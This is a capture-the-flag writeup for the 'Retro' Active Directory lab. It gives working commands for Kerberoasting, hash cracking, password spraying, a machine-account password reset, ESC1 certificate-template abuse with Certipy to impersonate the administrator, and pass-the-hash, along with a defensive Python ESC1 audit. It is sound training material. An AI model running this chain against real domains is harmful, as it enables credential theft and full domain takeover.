
Machine (Easy) - Retro

Writeup for the Retro machine, an easy-level Windows Active Directory environment created by r0BIT. The box involves Kerberoasting, password reuse, and an AD CS ESC1 abuse path that starts from a computer account whose password can be reset and ends at a misconfigured certificate template.

Writeup Author: BobBuilder


Objective: Abuse a vulnerable certificate template via a misconfigured machine account to impersonate the domain administrator.

Category: Machine | Difficulty: Easy | Platform: Windows | Machine Author: r0BIT


Root

Step 1: Enumerate Domain Users via Guest

impacket-lookupsid retro.vl/guest:''@retro.vl -no-pass

We find:

RETRO\jburley
RETRO\BANKING$
RETRO\trainee
RETRO\tblack

Step 2: Kerberoasting

We check whether any of these accounts has a service principal name (SPN) set and request service tickets for them:

impacket-GetUserSPNs -target-domain retro.vl -usersfile retro_users.txt retro.vl/guest:'' -no-pass

BANKING$ has an SPN, so a TGS-REP hash is returned. We crack it with Hashcat (mode 13100, Kerberos TGS-REP):

hashcat -m 13100 hashes.txt uniq.lst

Step 3: Try SMB Authentication

nxc smb <retro_ip> -u 'BANKING$' -p '<REDACTED>'
  • Fails with STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, which is expected: computer accounts are workstation trust accounts and this logon type is refused for them.

We try the cracked password against other known usernames:

nxc smb <retro_ip> -u retro_users.txt -p '<REDACTED>'
  • trainee:<REDACTED> is a valid login.

Step 4: Enumerate SMB Shares

nxc smb <retro_ip> -u trainee -p '<REDACTED>' -M spider_plus -o DOWNLOAD_FLAG=True

Two files are discovered:

  • Notes/ToDo.txt – Mentions an old computer account used by the finance department.
  • Trainees/Important.txt – All trainees use the same shared account: trainee:trainee

Step 5: Reset the Computer Account Password

We reset the password of BANKING$ over the SAMR RPC interface, authenticating with its existing (old) credentials:

impacket-changepasswd 'retro.vl/<REDACTED>':banking@retro.vl -newpass Password1 -dc-ip <dc_ip> -p rpc-samr

This allows us to authenticate as BANKING$ using Password1.

Step 6: Enumerate AD CS

nxc ldap <retro_ip> -u 'RETRO\BANKING$' -p 'Password1' -M adcs

We identify a vulnerable certificate template named RetroClients.

certipy-ad find -vulnerable -u 'BANKING$@retro.vl' -p 'Password1' -stdout -dc-ip <retro_ip>

Key points:

  • RETRO.VL\Domain Computers can enroll
  • EnrolleeSuppliesSubject is set
  • Client Authentication is enabled

→ This is vulnerable to ESC1 abuse.
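As an added defender-side example (not code from the writeup or from Certipy), the following Python evaluates the same ESC1 preconditions against a template's raw AD attribute values. The RetroClients dict is constructed from the findings listed above; the low-privileged group list and the "fixed" variant are assumptions about how an administrator would remediate.

```python
# Added example, not from the writeup: audit an AD CS template object for the
# ESC1 conditions listed above, using its raw AD attribute values.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (manager approval)

# EKU OIDs that make a certificate usable for Kerberos (PKINIT) logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Assumption: these groups count as low-privileged enrollers in this audit.
LOW_PRIV_GROUPS = {"Domain Users", "Domain Computers", "Authenticated Users"}

def esc1_checks(template):
    # Each ESC1 precondition and whether it holds for this template.
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    # Enrollment rights are listed as DOMAIN\Group; compare on the group name.
    enrollers = {p.split("\\")[-1] for p in template.get("enrollment_rights", [])}
    return {
        "enrollee_supplies_subject": bool(
            template.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        # An empty EKU list means "any purpose", which also permits logon.
        "authentication_eku": not ekus or bool(ekus & AUTH_EKUS),
        "no_manager_approval": not (
            template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": template.get("msPKI-RA-Signature", 0) == 0,
        "low_priv_can_enroll": bool(enrollers & LOW_PRIV_GROUPS),
    }

def is_esc1(template):
    # ESC1 needs every condition at once, so clearing any one of them removes it.
    return all(esc1_checks(template).values())

# Constructed sample mirroring the writeup's RetroClients findings.
RETRO_CLIENTS = {
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollment_rights": ["RETRO.VL\\Domain Computers"],
}
# Same template after remediation (assumed fix): the subject is built from AD,
# not supplied by the requester, and requests are held for manager approval.
RETRO_CLIENTS_FIXED = dict(RETRO_CLIENTS, **{
    "msPKI-Certificate-Name-Flag": 0,
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
})
```

Either remediation alone is enough to break the ESC1 chain; the check reports every condition so the remaining ones can still be reviewed.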

Step 7: Request Certificate with Correct Key Length

Requesting with Certipy's default key size is rejected by the template, so we pass the key size it expects (4096 bits):

certipy-ad req -u 'BANKING$@retro.vl' -p 'Password1' -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip <retro_ip> -key-size 4096

Because the template lets the enrollee supply the subject, the CA issues a certificate carrying the administrator UPN.

Step 8: Use Certificate to Authenticate

Make sure the local clock matches the domain controller, since Kerberos rejects requests with too much clock skew:

sudo net time set -S dc01.retro.vl

Authenticate with the certificate:

certipy-ad auth -pfx administrator.pfx -dc-ip <retro_ip>

Certipy successfully retrieves:

  • TGT for administrator@retro.vl
  • NT hash for the administrator account

Step 9: Execute as Administrator

Use the NT hash (pass-the-hash) to execute remote commands:

impacket-smbexec administrator@retro.vl -hashes <REDACTED>